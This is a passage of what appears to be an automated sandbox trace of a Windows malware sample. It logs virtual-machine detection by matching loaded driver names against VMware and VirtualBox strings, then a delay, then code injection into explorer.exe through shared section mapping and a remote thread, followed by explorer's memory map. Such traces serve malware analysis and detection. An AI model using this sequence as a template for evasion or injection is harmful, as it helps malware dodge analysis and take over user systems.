[0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vmci.s") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vmusbm") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vmmous") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vm3dmp") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vmrawd") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vmmemc") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vboxgu") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vboxsf") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vboxmo") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vboxvi") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vboxdi") returned 0x0 [0093.546] strstr (_Str="werkernel.sys", _SubStr="vioser") returned 0x0 [0093.546] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0093.546] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0093.546] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0093.546] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0093.546] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0093.547] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0093.547] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0093.547] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0093.547] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0093.547] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0093.547] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0093.547] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vmci.s") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vmusbm") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vmmous") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vm3dmp") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vmrawd") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vmmemc") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vboxgu") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vboxsf") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vboxmo") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vboxvi") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vboxdi") returned 0x0 [0093.547] strstr (_Str="tm.sys", _SubStr="vioser") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0093.548] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0093.548] strstr (_Str="bootvid.dll", _SubStr="vmci.s") returned 0x0 [0093.548] strstr (_Str="bootvid.dll", _SubStr="vmusbm") returned 0x0 [0093.548] strstr (_Str="bootvid.dll", _SubStr="vmmous") returned 0x0 [0093.549] strstr (_Str="bootvid.dll", _SubStr="vm3dmp") returned 0x0 [0093.549] strstr (_Str="bootvid.dll", _SubStr="vmrawd") returned 0x0 [0093.549] strstr (_Str="bootvid.dll", _SubStr="vmmemc") returned 0x0 [0093.549] strstr (_Str="bootvid.dll", _SubStr="vboxgu") returned 0x0 [0093.549] strstr (_Str="bootvid.dll", _SubStr="vboxsf") returned 0x0 [0093.549] strstr (_Str="bootvid.dll", _SubStr="vboxmo") returned 0x0 [0093.549] strstr (_Str="bootvid.dll", _SubStr="vboxvi") returned 0x0 [0093.549] strstr (_Str="bootvid.dll", _SubStr="vboxdi") returned 0x0 [0093.549] strstr (_Str="bootvid.dll", _SubStr="vioser") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vmci.s") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vmusbm") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vmmous") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vm3dmp") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vmrawd") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vmmemc") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vboxgu") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vboxsf") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vboxmo") returned 0x0 [0093.549] strstr (_Str="cmimcext.sys", _SubStr="vboxvi") returned 0x0 [0093.550] strstr (_Str="cmimcext.sys", _SubStr="vboxdi") returned 0x0 [0093.550] strstr (_Str="cmimcext.sys", _SubStr="vioser") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vmci.s") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vmusbm") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vmmous") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vm3dmp") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vmrawd") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vmmemc") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vboxgu") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vboxsf") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vboxmo") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vboxvi") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vboxdi") returned 0x0 [0093.550] strstr (_Str="ntosext.sys", _SubStr="vioser") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0093.551] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0093.551] strstr (_Str="msrpc.sys", _SubStr="vmci.s") returned 0x0 [0093.551] strstr (_Str="msrpc.sys", _SubStr="vmusbm") returned 0x0 [0093.551] strstr (_Str="msrpc.sys", _SubStr="vmmous") returned 0x0 [0093.551] strstr (_Str="msrpc.sys", _SubStr="vm3dmp") returned 0x0 [0093.551] strstr (_Str="msrpc.sys", _SubStr="vmrawd") returned 0x0 [0093.551] strstr (_Str="msrpc.sys", _SubStr="vmmemc") returned 0x0 [0093.551] strstr (_Str="msrpc.sys", _SubStr="vboxgu") returned 0x0 [0093.551] strstr (_Str="msrpc.sys", _SubStr="vboxsf") returned 0x0 [0093.552] strstr (_Str="msrpc.sys", _SubStr="vboxmo") returned 0x0 [0093.552] strstr (_Str="msrpc.sys", _SubStr="vboxvi") returned 0x0 [0093.552] strstr (_Str="msrpc.sys", _SubStr="vboxdi") returned 0x0 [0093.552] strstr (_Str="msrpc.sys", _SubStr="vioser") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vmci.s") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vmusbm") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vmmous") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vm3dmp") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vmrawd") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vmmemc") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vboxgu") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vboxsf") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vboxmo") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vboxvi") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vboxdi") returned 0x0 [0093.552] strstr (_Str="fltmgr.sys", _SubStr="vioser") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vmci.s") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vmusbm") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vmmous") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vm3dmp") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vmrawd") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vmmemc") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vboxgu") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vboxsf") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vboxmo") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vboxvi") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vboxdi") returned 0x0 [0093.553] strstr (_Str="ksecdd.sys", _SubStr="vioser") returned 0x0 [0093.553] strstr (_Str="clipsp.sys", _SubStr="vmci.s") returned 0x0 [0093.553] strstr (_Str="clipsp.sys", _SubStr="vmusbm") returned 0x0 [0093.553] strstr (_Str="clipsp.sys", _SubStr="vmmous") returned 0x0 [0093.553] strstr (_Str="clipsp.sys", _SubStr="vm3dmp") returned 0x0 [0093.554] strstr (_Str="clipsp.sys", _SubStr="vmrawd") returned 0x0 [0093.554] strstr (_Str="clipsp.sys", _SubStr="vmmemc") returned 0x0 [0093.554] strstr (_Str="clipsp.sys", _SubStr="vboxgu") returned 0x0 [0093.554] strstr (_Str="clipsp.sys", _SubStr="vboxsf") returned 0x0 [0093.554] strstr (_Str="clipsp.sys", _SubStr="vboxmo") returned 0x0 [0093.554] strstr (_Str="clipsp.sys", _SubStr="vboxvi") returned 0x0 [0093.554] strstr (_Str="clipsp.sys", _SubStr="vboxdi") returned 0x0 [0093.554] strstr (_Str="clipsp.sys", _SubStr="vioser") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0093.554] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0093.555] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0093.555] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0093.555] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vmci.s") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vmusbm") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vmmous") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vm3dmp") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vmrawd") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vmmemc") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vboxgu") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vboxsf") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vboxmo") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vboxvi") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vboxdi") returned 0x0 [0093.556] strstr (_Str="acpiex.sys", _SubStr="vioser") returned 0x0 [0093.556] strstr (_Str="wpprecorder.sys", _SubStr="vmci.s") returned 0x0 [0093.556] strstr (_Str="wpprecorder.sys", _SubStr="vmusbm") returned 0x0 [0093.556] strstr (_Str="wpprecorder.sys", _SubStr="vmmous") returned 0x0 [0093.557] strstr (_Str="wpprecorder.sys", _SubStr="vm3dmp") returned 0x0 [0093.557] strstr (_Str="wpprecorder.sys", _SubStr="vmrawd") returned 0x0 [0093.557] strstr (_Str="wpprecorder.sys", _SubStr="vmmemc") returned 0x0 [0093.557] strstr (_Str="wpprecorder.sys", _SubStr="vboxgu") returned 0x0 [0093.557] strstr (_Str="wpprecorder.sys", _SubStr="vboxsf") returned 0x0 [0093.557] strstr (_Str="wpprecorder.sys", _SubStr="vboxmo") returned 0x0 [0093.557] strstr (_Str="wpprecorder.sys", _SubStr="vboxvi") returned 0x0 [0093.557] strstr (_Str="wpprecorder.sys", _SubStr="vboxdi") returned 0x0 [0093.557] strstr (_Str="wpprecorder.sys", _SubStr="vioser") returned 0x0 [0093.557] strstr (_Str="cng.sys", _SubStr="vmci.s") returned 0x0 [0093.557] strstr (_Str="cng.sys", _SubStr="vmusbm") returned 0x0 [0093.557] strstr (_Str="cng.sys", _SubStr="vmmous") returned 0x0 [0093.557] strstr (_Str="cng.sys", _SubStr="vm3dmp") returned 0x0 [0093.557] strstr (_Str="cng.sys", _SubStr="vmrawd") returned 0x0 [0093.557] strstr (_Str="cng.sys", _SubStr="vmmemc") returned 0x0 [0093.557] strstr (_Str="cng.sys", _SubStr="vboxgu") returned 0x0 [0093.557] strstr (_Str="cng.sys", _SubStr="vboxsf") returned 0x0 [0093.557] strstr (_Str="cng.sys", _SubStr="vboxmo") returned 0x0 [0093.559] LocalFree (hMem=0x1db2050) returned 0x0 [0093.559] Sleep (dwMilliseconds=0x1388) [0098.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ff1c*=0x0, ZeroBits=0x0, RegionSize=0x19ff24*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ff1c*=0x1d0000, RegionSize=0x19ff24*=0x6000) returned 0x0 [0098.563] GetShellWindow () returned 0x100de [0098.563] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0x19fec8 | out: lpdwProcessId=0x19fec8) returned 0x7b8 [0098.563] NtOpenProcess (in: ProcessHandle=0x19ff18, DesiredAccess=0x40, ObjectAttributes=0x19ff00*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19fef8*(UniqueProcess=0x7b4, UniqueThread=0x0) | out: ProcessHandle=0x19ff18*=0x15c) returned 0x0 [0098.563] NtDuplicateObject (in: SourceProcessHandle=0x15c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x19ff1c, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x19ff1c*=0x160) returned 0x0 [0098.563] NtCreateSection (in: SectionHandle=0x19fed4, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed4*=0x164) returned 0x0 [0098.563] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0xffffffff, BaseAddress=0x19fee4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee4*=0x1f0000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0098.564] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0x160, BaseAddress=0x19feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19feec*=0x540000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0104.649] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f0000, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe")) returned 0x62 [0104.649] NtCreateSection (in: SectionHandle=0x19fed0, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed0*=0x168) returned 0x0 [0104.653] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0xffffffff, BaseAddress=0x19fee0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee0*=0x450000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0104.654] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0x160, BaseAddress=0x19fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x19fee8*=0x3d20000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0104.658] RtlCreateUserThread (in: ProcessHandle=0x160, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x3d21930, Parameter=0x540000, ThreadHandle=0x19fe30*=0xc401db2048, ClientId=0x0 | out: ThreadHandle=0x19fe30*=0x16c, ClientId=0x0) returned 0x0 [0104.660] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 4 os_tid = 0x1378 Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x2ab5c000" os_pid = "0x7b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 384 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 385 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 386 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 387 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 388 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 389 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 390 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 391 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 392 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 393 start_va = 0x1d0000 end_va = 0x1d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 394 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 395 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 396 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 397 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 398 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 399 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 400 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 401 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 402 start_va = 0x540000 end_va = 0x544fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 403 start_va = 0x550000 end_va = 0x550fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 404 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 405 start_va = 0x570000 end_va = 0x581fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 406 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 407 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 408 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 409 start_va = 0x5c0000 end_va = 0x5c1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 410 start_va = 0x5d0000 end_va = 0x5e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 411 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 412 start_va = 0x600000 end_va = 0x60afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 413 start_va = 0x610000 end_va = 0x611fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 414 start_va = 0x620000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 415 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 416 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 417 start_va = 0x6b0000 end_va = 0x837fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 418 start_va = 0x840000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 419 start_va = 0x9d0000 end_va = 0x1dcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 420 start_va = 0x1dd0000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 421 start_va = 0x1e50000 end_va = 0x1e50fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 422 start_va = 0x1e60000 end_va = 0x1e61fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = 